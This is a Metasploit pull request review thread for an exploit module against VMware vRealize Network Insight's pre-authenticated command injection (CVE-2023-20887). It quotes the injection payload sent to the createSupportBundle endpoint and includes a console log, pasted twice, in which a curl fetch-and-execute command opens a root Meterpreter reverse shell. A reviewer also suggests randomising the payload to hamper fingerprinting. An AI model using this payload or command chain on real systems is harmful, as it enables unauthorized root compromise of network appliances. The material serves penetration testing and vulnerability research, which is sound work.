VMWare vRealize Network Insight pre-authenticated RCE CVE-2023-20887
rapid7/metasploit-framework pull request #18093
Opened 2023-06-13 14:18 UTC by sinsinology

fixes #18092

Technical details at
https://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-20887/

2023-06-13 14:44 UTC, h00die requested changes

2023-06-13 14:44 UTC, h00die commented on modules/exploits/linux/http/vmware_vrni_rce_cve_2023_20887.rb
> +    return send_request_cgi({
this can be cleaned up:
```
send_request_cgi({

Styling with Markdown is supported
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'api', 'vip', 'i18n, 'api, 'v2, 'translation, 'products, 'vRNIUI, 'versions, '6.8.0, 'locales, 'en-GB, 'components, 'UI),
    'vars_get' => { 'pseudo' => 'false'}
    })
```

2023-06-13 14:44 UTC, h00die commented on modules/exploits/linux/http/vmware_vrni_rce_cve_2023_20887.rb
> +    if body.nil? || body['data']['productName'] != 'vRNIUI'
use `dig` here to traverse the json document

2023-06-13 14:44 UTC, h00die commented on modules/exploits/linux/http/vmware_vrni_rce_cve_2023_20887.rb
> +    return CheckCode::Vulnerable if body['data']['productName'] == "6.8.0"
According to https://kb.vmware.com/s/article/92684 there are vulnerable version in 6.2 - 6.10. This seems unnecessarily restrictive and may not correctly identify patched versions.

2023-06-13 14:44 UTC, h00die commented on modules/exploits/linux/http/vmware_vrni_rce_cve_2023_20887.rb
> +    return send_request_cgi({
According to https://kb.vmware.com/s/article/92684 there are vulnerable version in 6.2 - 6.10, this hard codes 6.8.0, and will miss many other versions

2023-06-13 14:44 UTC, h00die commented on modules/exploits/linux/http/vmware_vrni_rce_cve_2023_20887.rb
> +          VMWare Aria Operations for Networks (vRealize Network Insight) is vulnerable to command injection when accepting user input through the Apache Thrift RPC interface. This vulnerability allow
seems like a very long line

2023-06-13 14:44 UTC, h00die commented on modules/exploits/linux/http/vmware_vrni_rce_cve_2023_20887.rb
> +          'Sina Kheirkhah', # Metasploit Module (@SinSinology) of Summoning Team (@SummoningTeam) on twitter
Not sure if others will agree, but the CVE is credited to "Anonymous working with Trend Micro Zero Day Initiative for reporting this issue to us.", maybe add "anonymous with Trend Micro Zero Day Initiative"?

2023-06-13 14:44 UTC, h00die commented on modules/exploits/linux/http/vmware_vrni_rce_cve_2023_20887.rb
> +      'uri' => normalize_uri(target_uri.path,'/saas./resttosaasservlet'),
```
normalize_uri(target_uri.path,'saas.', 'resttosaasservlet'),
```

2023-06-13 18:53 UTC, jvoisin commented on modules/exploits/linux/http/vmware_vrni_rce_cve_2023_20887.rb
> +    pop_thy_shell = "[1,\"createSupportBundle\",1,0,{\"1\":{\"str\":\"1111\"},\"2\":{\"str\":\"`sudo #{cmd}`\"},\"3\":{\"str\":\"value3\"},\"4\":{\"lst\":[\"str\",2,\"AAAA\",\"BBBB\"]}}]"
I think that everything after the shell injection can be randomised/golfed to make fingerprinting a tad harder.

2023-06-13 18:53 UTC, jvoisin commented on modules/exploits/linux/http/vmware_vrni_rce_cve_2023_20887.rb
> +    pop_thy_shell = "[1,\"createSupportBundle\",1,0,{\"1\":{\"str\":\"1111\"},\"2\":{\"str\":\"`sudo #{cmd}`\"},\"3\":{\"str\":\"value3\"},\"4\":{\"lst\":[\"str\",2,\"AAAA\",\"BBBB\"]}}]"
Please rename `pop_thy_shell` to `payload` :o)

2023-06-13 18:53 UTC, jvoisin commented on modules/exploits/linux/http/vmware_vrni_rce_cve_2023_20887.rb
> +  rescue StandardError => e
I don't think that `send_request_cgi` can raise exceptions.

2023-06-13 19:07 UTC, wvu commented on modules/exploits/linux/http/vmware_vrni_rce_cve_2023_20887.rb
> +      'uri' => normalize_uri(target_uri.path,'/saas./resttosaasservlet'),
I think this usage of `normalize_uri` is less clear and kind of an anti-pattern.

2023-06-13 20:11 UTC, jheysel-r7 commented on modules/exploits/linux/http/vmware_vrni_rce_cve_2023_20887.rb
> +  rescue StandardError => e
I believe you're correct @jvoisin, exceptions are handled behind the scenes here:
https://github.com/rapid7/metasploit-framework/blob/9c20d0f84b8dbb0434ce99d9158562e648386dd8/lib/msf/core/exploit/remote/http_client.rb#L380-L388

2023-06-15 14:02 UTC, jmartin-tech reviewed
Great module, please address comments from all reviewers.

2023-06-15 14:02 UTC, jmartin-r7 commented on modules/exploits/linux/http/vmware_vrni_rce_cve_2023_20887.rb
> +    return CheckCode::Vulnerable if body['data']['productName'] == "6.8.0"
Consider testing with `Rex::Version`?

2023-06-15 14:02 UTC, jmartin-r7 commented on modules/exploits/linux/http/vmware_vrni_rce_cve_2023_20887.rb
> +    fail_with(Failure::Unknown, "Communication error occurred: #{e.message}")
Also just for awareness, `fail_with` should not be called in a scope that could execute during `check`.

2023-06-16 18:47 UTC, jheysel-r7 commented on modules/exploits/linux/http/vmware_vrni_rce_cve_2023_20887.rb
> +        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
```suggestion
        'Arch' => [ARCH_CMD, ARCH_X64],
```
Should `ARCH_x86` be removed? I couldn't find out whether or not 32-bit architecture is supported by vRealize Network Insights after a quick google. I noticed your Linux Dropper target doesn't specify `ARCH_X86`

2023-06-16 19:26 UTC, jheysel-r7 reviewed
Thanks for the module @sinsinology!

A couple suggestions to support Metasploit's latest and greatest feature:
> Fetch payloads are adapted, command-based payloads use network-enabled binaries on a remote host to download binary payloads to that remote host. 

More info on: [Fetch payloads](https://docs.metasploit.com/docs/development/developing-modules/guides/how-to-use-fetch-payloads.html)

Looking great so far. I've tested on `VMware-vRealize-Network-Insight-6.8.0.1666364233-platform.ova` and will retest once all the final edits have been made. Let me know if you have any questions.


```
msf6 > use linux/http/vmware_vrni_rce_cve_2023_20887
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
msf6 exploit(linux/http/vmware_vrni_rce_cve_2023_20887) > set rhost 192.168.0.60
rhost => 192.168.0.60
msf6 exploit(linux/http/vmware_vrni_rce_cve_2023_20887) > set rhost 192.168.1.60
rhost => 192.168.1.60
msf6 exploit(linux/http/vmware_vrni_rce_cve_2023_20887) > set lhost 192.168.1.69
lhost => 192.168.1.69
msf6 exploit(linux/http/vmware_vrni_rce_cve_2023_20887) > set FETCH_SRVHOST 192.168.1.69
FETCH_SRVHOST => 192.168.1.69
msf6 exploit(linux/http/vmware_vrni_rce_cve_2023_20887) > options

Module options (exploit/linux/http/vmware_vrni_rce_cve_2023_20887):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS   192.168.1.60     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT    443              yes       The target port (TCP)
   SSL      true             no        Negotiate SSL/TLS for outgoing connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)
   VHOST                     no        HTTP server virtual host


   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.


Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
   FETCH_FILENAME      hHTNUdqFrV       no        Name to use on remote system when storing payload; cannot contain spaces.
   FETCH_SRVHOST       192.168.1.69     yes       Local IP to use for serving payload
   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
   FETCH_URIPATH                        no        Local URI to use for serving payload
   FETCH_WRITABLE_DIR                   yes       Remote writable dir to store payload; cannot contain spaces.
   LHOST               192.168.1.69     yes       The listen address (an interface may be specified)
   LPORT               4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Unix (In-Memory)



View the full module info with the info, or info -d command.

msf6 exploit(linux/http/vmware_vrni_rce_cve_2023_20887) > run

[*] Started reverse TCP handler on 192.168.1.69:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.1.60:443 can be exploited.
[+] The target appears to be vulnerable. Target is running VMWare Aria Operations for Networks (vRealize Network Insight).
[*] Executing Unix (In-Memory) with curl -so ./hPflBCdJ http://192.168.1.69:8080/IuNTbJhCeJ7dM3CRAasGAw; chmod +x ./hPflBCdJ; ./hPflBCdJ &
[*] pop thy shell!!!
[*] Sending stage (3045348 bytes) to 192.168.1.60
[*] Meterpreter session 3 opened (192.168.1.69:4444 -> 192.168.1.60:47346) at 2023-06-16 15:02:53 -0400

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 192.168.1.60
OS           : Ubuntu 18.04 (Linux 5.4.0-126-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >
```

2023-06-16 20:03 UTC, jheysel-r7 reviewed
Thanks for the module @sinsinology!

A couple suggestions to support Metasploit's latest and greatest feature:
> Fetch payloads are adapted, command-based payloads use network-enabled binaries on a remote host to download binary payloads to that remote host. 

More info on: [Fetch payloads](https://docs.metasploit.com/docs/development/developing-modules/guides/how-to-use-fetch-payloads.html)

Looking great so far. I've tested on `VMware-vRealize-Network-Insight-6.8.0.1666364233-platform.ova` and will retest once all the final edits have been made. Let me know if you have any questions.


```
msf6 > use linux/http/vmware_vrni_rce_cve_2023_20887
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
msf6 exploit(linux/http/vmware_vrni_rce_cve_2023_20887) > set rhost 192.168.0.60
rhost => 192.168.0.60
msf6 exploit(linux/http/vmware_vrni_rce_cve_2023_20887) > set rhost 192.168.1.60
rhost => 192.168.1.60
msf6 exploit(linux/http/vmware_vrni_rce_cve_2023_20887) > set lhost 192.168.1.69
lhost => 192.168.1.69
msf6 exploit(linux/http/vmware_vrni_rce_cve_2023_20887) > set FETCH_SRVHOST 192.168.1.69
FETCH_SRVHOST => 192.168.1.69
msf6 exploit(linux/http/vmware_vrni_rce_cve_2023_20887) > options

Module options (exploit/linux/http/vmware_vrni_rce_cve_2023_20887):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS   192.168.1.60     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT    443              yes       The target port (TCP)
   SSL      true             no        Negotiate SSL/TLS for outgoing connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)
   VHOST                     no        HTTP server virtual host


   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.


Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
   FETCH_FILENAME      hHTNUdqFrV       no        Name to use on remote system when storing payload; cannot contain spaces.
   FETCH_SRVHOST       192.168.1.69     yes       Local IP to use for serving payload
   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
   FETCH_URIPATH                        no        Local URI to use for serving payload
   FETCH_WRITABLE_DIR                   yes       Remote writable dir to store payload; cannot contain spaces.
   LHOST               192.168.1.69     yes       The listen address (an interface may be specified)
   LPORT               4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Unix (In-Memory)



View the full module info with the info, or info -d command.

msf6 exploit(linux/http/vmware_vrni_rce_cve_2023_20887) > run

[*] Started reverse TCP handler on 192.168.1.69:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.1.60:443 can be exploited.
[+] The target appears to be vulnerable. Target is running VMWare Aria Operations for Networks (vRealize Network Insight).
[*] Executing Unix (In-Memory) with curl -so ./hPflBCdJ http://192.168.1.69:8080/IuNTbJhCeJ7dM3CRAasGAw; chmod +x ./hPflBCdJ; ./hPflBCdJ &
[*] pop thy shell!!!
[*] Sending stage (3045348 bytes) to 192.168.1.60
[*] Meterpreter session 3 opened (192.168.1.69:4444 -> 192.168.1.60:47346) at 2023-06-16 15:02:53 -0400

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 192.168.1.60
OS           : Ubuntu 18.04 (Linux 5.4.0-126-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >
```

2023-06-16 20:03 UTC, jheysel-r7 commented on modules/exploits/linux/http/vmware_vrni_rce_cve_2023_20887.rb
> +    pop_thy_shell = "[1,\"createSupportBundle\",1,0,{\"1\":{\"str\":\"1111\"},\"2\":{\"str\":\"`sudo #{cmd}`\"},\"3\":{\"str\":\"value3\"},\"4\":{\"lst\":[\"str\",2,\"AAAA\",\"BBBB\"]}}]"
```suggestion
    pop_thy_shell = "[1,\"createSupportBundle\",1,0,{\"1\":{\"str\":\"1111\"},\"2\":{\"str\":\"`sudo bash -c '#{cmd}'`\"},\"3\":{\"str\":\"value3\"},\"4\":{\"lst\":[\"str\",2,\"AAAA\",\"BBBB\"]}}]"
```
Fetch payload compatibility suggestion (4/4)

`cmd` when using the fetch payload: `cmd/linux/http/x64/meterpreter/reverse_tcp` becomes:
`curl -so ./hPflBCdJ http://192.168.1.69:8080/IuNTbJhCeJ7dM3CRAasGAw; chmod +x ./hPflBCdJ; ./hPflBCdJ &`
In order for the entire payload to execute successfully it's best to pass the entire payload as a single argument to `bash -c`

2023-06-23 17:58 UTC, closed without merging